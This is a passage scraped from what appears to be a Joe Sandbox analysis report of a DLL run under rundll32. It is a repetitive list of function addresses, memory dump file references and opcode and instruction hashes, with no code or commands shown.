                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: e68fe382fa2dcf4ff6b3b30b993bc735eba529e2ee0dc5595dbc872ccf23c2fc
                                                                                                                                                                                                                            • Instruction ID: ed50f736550100c6acce9c806118f367a3d8fbade86ca183456f301f606d298a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e68fe382fa2dcf4ff6b3b30b993bc735eba529e2ee0dc5595dbc872ccf23c2fc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA51D07360961892E7AF8F68C1543BC27A0E359B98F258105EF591B7D9CF30CE8AC780
                                                                                                                                                                                                                            Function 00000001800219B0 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: a092dc30a4f2ae000ced6d624bb414cc541e72dc8427ff6f622ee75778ee90ff
                                                                                                                                                                                                                            • Instruction ID: f7564a3caa832c9d2798ddfb63b8de6714ffd269db31ccbb87da067d1bb341d1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a092dc30a4f2ae000ced6d624bb414cc541e72dc8427ff6f622ee75778ee90ff
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9751AF732016588AE7AB8F28C1543ED27B0E369BDAF158115EF4A177D8DB31CE89C781
                                                                                                                                                                                                                            Function 00000001800249C0 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: b03ae1bfdee680c912befaaab35fda22709134f8120bb8272bfebd5d1c60647b
                                                                                                                                                                                                                            • Instruction ID: 0dcacf819d1c56b5dbd6b9fb192ee6a80ba3ce6f641782da27fd2866f7e2b0cf
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b03ae1bfdee680c912befaaab35fda22709134f8120bb8272bfebd5d1c60647b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C51CD77614A5882E7AB8F28D0543AC37A0E358B98F158109EF4A1B799CF31CE89C784
                                                                                                                                                                                                                            Function 0000000180022BBC Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: beb3d746ad82b353f9126306115dbc722a697e6eb63320ea30e9ba7c027299f1
                                                                                                                                                                                                                            • Instruction ID: 17afe33e2cfbad9f78922fa842bdf410e1a52d1a7bd57f5fc5781fbc1f5f20f3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: beb3d746ad82b353f9126306115dbc722a697e6eb63320ea30e9ba7c027299f1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1651C073600A5892E7AB8F68C1543AC37A0E759BD8F258119EF5917799CF34CE8AC780
                                                                                                                                                                                                                            Function 0000000180022DA4 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 71fa5d43da57a3174cc882875f8edd322993002f3321b49903878c9ad7fc301b
                                                                                                                                                                                                                            • Instruction ID: ae86d7d4ed8143fee51dc7355ad1596ae77caff2d947808aad15c8bb449e0020
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71fa5d43da57a3174cc882875f8edd322993002f3321b49903878c9ad7fc301b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A051BF7360065893EBAF8F68C1543AC27B0E359B98F168124EF5617799CF31DE8AD780
                                                                                                                                                                                                                            Function 0000000180020FA0 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 9f019b656b0a28ece1a0596775029295520578bcd455020e1fa1a0b78e3e64e3
                                                                                                                                                                                                                            • Instruction ID: 4355b762eb9d42ce107d17c21a6ce3dca1b3f1e52917a1d70d1103f013def09f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f019b656b0a28ece1a0596775029295520578bcd455020e1fa1a0b78e3e64e3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A051C2776046988AE7AB8F28C1943ED27A0E36DB9AF258114EF45177D9CB31CE85C780
                                                                                                                                                                                                                            Function 0000000180023FB0 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: fbdbcf71cd60221fe95916cb15d783800b845a272af648f4626f4e9924f3daa7
                                                                                                                                                                                                                            • Instruction ID: cbf566ccdaf1245ef57d5a6868b7b43919396778c2e238ce497a9308c17c4575
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fbdbcf71cd60221fe95916cb15d783800b845a272af648f4626f4e9924f3daa7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B251C477600A5882E7AB8F28D1943AD37B0E358B98F158115EF4A1B799CF31DED9C780
                                                                                                                                                                                                                            Function 0000000180046CAC Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                                            • Opcode ID: f2bf2f44804211bbc956858bbddf9f4d52737702c71a905d465bb91da0ad6b12
                                                                                                                                                                                                                            • Instruction ID: fc019565bc309eafb7e8d69423c872a858b621f5fd49a27179c449119fb9b58e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f2bf2f44804211bbc956858bbddf9f4d52737702c71a905d465bb91da0ad6b12
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9141AF32710A5892EB85CF2AD9553D9A3A1B34CFD4F49D026EE4D87B68EE3DC2468305
                                                                                                                                                                                                                            Function 000000018002E554 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: a2ae6fed8cf75391e0291909193d044d3d9fe363135ba26d95f2311c859f37c2
                                                                                                                                                                                                                            • Instruction ID: 140c7d41740b8b8519f6bfbf387fa7969dbb6e49980347efb6bda0b36bebd412
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2ae6fed8cf75391e0291909193d044d3d9fe363135ba26d95f2311c859f37c2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF419F72114A8881E7A68F2AC04939D77A1F35ABDCF288215EF9D4B7E9CF35C589C704
                                                                                                                                                                                                                            Function 000000018002E400 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: e7d0b9737ad121b3124e9f4498d8c0b31db2b34df03fba385aff4766f8564834
                                                                                                                                                                                                                            • Instruction ID: e207b00886b0c8d1c088dc1313d1619de03373ae8e53df3fdb771979a07e1de7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7d0b9737ad121b3124e9f4498d8c0b31db2b34df03fba385aff4766f8564834
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48418D72214AD882E7A68F2AD08139977A1E34AB9CF188215EF5D0B7E9CF35C585C704
                                                                                                                                                                                                                            Function 000000018002E6D0 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: e7d0b9737ad121b3124e9f4498d8c0b31db2b34df03fba385aff4766f8564834
                                                                                                                                                                                                                            • Instruction ID: 59284e515db0d929f4191069cd426df7778dd2db08eb2369e4545667b882949d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7d0b9737ad121b3124e9f4498d8c0b31db2b34df03fba385aff4766f8564834
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7417E72208BC882E7A68F2AD08539D77A1E34AF98F289215EF9D0B7E5CF35C545C714
                                                                                                                                                                                                                            Function 000000018001CFF8 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: f7226ce8fd321ddddb00fa92aa08975f3542884d578256a1b0f875ad76357bb0
                                                                                                                                                                                                                            • Instruction ID: 08583fe5aa8dd3b47af6919775a42c2bb4a9465dec4194a7304c23a06bfae4bb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7226ce8fd321ddddb00fa92aa08975f3542884d578256a1b0f875ad76357bb0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59313E72204A98C6EB668F29E4403AD77A0F79CB8CF658126EB4C4B751DF36C596C704
                                                                                                                                                                                                                            Function 0000000180020044 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 5e330472036477ade6a4515b12e6e20f7643401a6b0ad1c9837015855f607934
                                                                                                                                                                                                                            • Instruction ID: 07b90c267bed5726b7726365927361ad7fa3bdfa26e0568186f5ba47de6a0d74
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e330472036477ade6a4515b12e6e20f7643401a6b0ad1c9837015855f607934
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82318472214744C6EBA68F29E0803AD77A0F79CB8CF658115EB8C4B762DF36C596CB04
                                                                                                                                                                                                                            Function 000000018001E080 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 7921c905145295feddc74e303290acec1d78bddd6388240dfaeb8e89972c690d
                                                                                                                                                                                                                            • Instruction ID: e2750cbceadae0b8fb73ce86da71186fad63093852b488e0998b08d44c95c953
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7921c905145295feddc74e303290acec1d78bddd6388240dfaeb8e89972c690d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5318472604A84C6EB658F29E4807AD77A0F78DF8CF258126EB4D4B751CF36C596CB04
                                                                                                                                                                                                                            Function 000000018001D104 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
